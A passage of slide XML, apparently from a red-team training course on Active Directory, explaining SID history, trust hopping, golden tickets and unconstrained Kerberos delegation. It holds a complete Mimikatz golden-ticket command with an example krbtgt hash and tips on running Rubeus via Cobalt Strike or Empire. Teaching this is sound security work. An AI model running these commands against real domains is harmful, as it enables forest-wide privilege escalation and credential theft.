              <a:t> des_cbc_md5 (4096) : 23762f45836b5219</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3E35E697-39D1-7641-AEE2-3F6A60E264FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="279733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C020E-4690-28DD-36FC-10CC64519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8EDD2-C1D3-6A25-2025-38BBDDE3153D}"/>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6A107211-64B4-9FE1-D110-04F987C3221F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This area is intentionally left blank.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A327E31F-F899-9127-511B-775FF71C1E68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3E35E697-39D1-7641-AEE2-3F6A60E264FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3203651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Once domain compromise has been achieved, the next step could be hopping trusts in order to compromise even more domains. The approach we can take for this varies from type of trust. In this course, we will cover two approaches:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="173038" indent="-173038">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Child to parent hop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="173038" indent="-173038">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tree root "generic" hop (could potentially also be used in child-parent hop)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reference:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://web.archive.org/web/20210614030052/https://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/</a:t>
            </a:r>
            <a:endParaRPr lang="en-BE"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29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3497159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This area is intentionally left blank.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3E35E697-39D1-7641-AEE2-3F6A60E264FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="831240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In order to understand how to hop from a child to a parent DC, we have to introduce a concept called SID history. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This was meant to facilitate the migration of users from one domain to another. If a user is migrated, their old security identifier (SID), along with the SIDs of any group they were previously a part of, can optionally be added to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sidHistory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> attribute of their new user account. When the new user attempts to access a resource, the authorization will take both the current SID and the SID that was set in the SID history into account!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reference:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Image source: https://www.flaticon.com/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3E35E697-39D1-7641-AEE2-3F6A60E264FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="77063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We have already identified that once we compromise the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>krbtgt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, we can force our own TGTs and have full control over the PAC. This means that we have full control over the SID history as well! </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This means that we can add optional SIDs to our user account and get those rights in the parent domain, too. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This attack only works within a forest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>—</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>it will not work cross-forest due to a mechanism called SID filtering, which will not allow SIDs of "privileged" groups to leave the forest boundary.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3E35E697-39D1-7641-AEE2-3F6A60E264FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2576656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 golden ticket and a silver ticket are almost the same thing. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Instead of compromising the service, we need to have compromised the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>krbTGT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> account of the domain.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> Remember, in Kerberos authentication, TGTs are signed with the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>krbTGT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> long-term key. Compromising the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>krbTGT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> account means we can now forge our own PACs inside TGTs, allowing us to modify the PAC to access anything we want within that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0"/>
              <a:t>domain.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0"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32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="983154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err="1"/>
              <a:t>Mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> can forge this golden trust (pun intended) ticket, but we will need to know the SID of the root domain. We can identify this SID by enumerating the domain trust with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PowerView</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, for example.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The SID of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>asgard.corp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in our example is S-1-5-21-2716382980-2373322634-4127565559.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The SID of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dev.asgard.corp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in our example is S-1-5-21-2866327014-263153327-3370111089.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>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C:\&gt; Mimikatz.exe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>kerberos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>::golden /user:DC01$ /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>domain:dev.asgard.corp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /sid:S-1-5-21-2866327014-263153327-3370111089 /sids:S-1-5-21-2716382980-2373322634-4127565559-516,S-1-5-9 /krbtgt:e818c815dfa9a5f03cae9d1687d59e68 /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ptt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>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3E35E697-39D1-7641-AEE2-3F6A60E264FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3134656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Cobalt Strike has built-in golden ticket creation functionality using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. However, the safest way of creating the ticket would be to either do it offline or use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>InlineExecute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-Assembly Beacon object file to run Rubeus. Another alternative would be importing invoke-Rubeus using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-import task.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="0" fontAlgn="base" latinLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Empire supports golden ticket creation natively with the "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/credentials/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>golden_ticket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>" task.</a:t>
            </a:r>
            <a:endParaRPr lang="en-BE"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34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2592663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The fun thing about domain controllers is that they are configured for unconstrained delegation. This is intended and is not something that can be "turned off," as the domain controller needs this functionality to function properly.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>Unconstrained delegation should already ring a bell, as we have covered earlier. Coercing an authentication back to us cross-forest means compromising the cross-forest trust. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>This is true for tree-root, but also for parent-child domains. In this case we will not need to add any extra SIDs as we would effectively force a machine cross trust to authenticate to us and steal its TGT. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3E35E697-39D1-7641-AEE2-3F6A60E264FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3458988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Kerberos delegation is a Kerberos feature that allows services to execute actions on behalf of authenticated users (impersonation). A common example to explain the need for delegation is front-end servers (e.g., web servers) that need to interact with back-end servers (e.g., database servers) on a client's behalf.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There are three types of delegations:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unconstrained: The most legacy of them all and very unsafe.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Constrained: Potentially safe, but potentially even worse than unconstrained, depending on configuration.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Resource-based constraints: The safest option.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We will discuss all of them in this module!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>References:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://web.archive.org/web/20220209070550/http://www.harmj0y.net/blog/activedirectory/s4u2pwnage/ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://shenaniganslabs.io/2019/08/08/Workshop-Slides.html</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3E35E697-39D1-7641-AEE2-3F6A60E264FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2325565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Microsoft launched an unconstrained delegation to solve the problem that is often referred to as the "double-hop" issue. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>If a user authenticates to Machine A and that machine needs to "relay" that authentication to another machine, Machine A will need to have some sort of mechanism to convey the credentials of the originating user.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>The way Microsoft designed the "fix" to the problem with unconstrained delegation is by replacing TGS PACs with the TGT of the originating user for all systems that are configured as unconstrained delegation systems.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>This means that Machine A now has the full TGT of the user and can thus use that user's TGT to relay to any additional machine.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>References:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>https://docs.microsoft.com/en-us/defender-for-identity/cas-isp-unconstrained-kerberos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>https://adsecurity.org/?p=1667</a:t>
            </a:r>
            <a:endParaRPr lang="en-BE" b="0"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37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="303354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Let's take a look at how unconstrained delegation authentication flows over the AD environment:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>User is going to pre-authenticate as usual (AS-REQ, AS-REP), which is going to give the user his/her TGT.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>The user wants to access Service A, so the user is going to ask the KDC to give out a service ticket for that service using his/her TGT (TGS-REQ), which the domain controller will do without batting an eye (TGS-REP).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>The user will now authenticate to Service A with the service ticket (AP-REQ). The service ticket the user has received looks different than a normal service ticket, though, because Service A is configured for unconstrained delegation. This means that the TGS for Service A will actually contain the TGT of the user. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>Service A authorizes the user to authenticate to itself and is now going to request, using the user's TGT, a TGS (TGS-REQ) for Service B, effectively fully impersonating the original user.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>The DC complies (TGS-REP). Now, Service A can authenticate to Service B on behalf of the original requestor (AP-REQ).</a:t>
            </a:r>
            <a:endParaRPr lang="en-BE" b="0"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38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4167388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We can find unconstrained delegation systems by querying the computer objects in AD. We will introduce an additional flag in our search query called the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>userAccountControl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>. These values are described on the MSDN. The value for unconstrained delegation is 524288.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
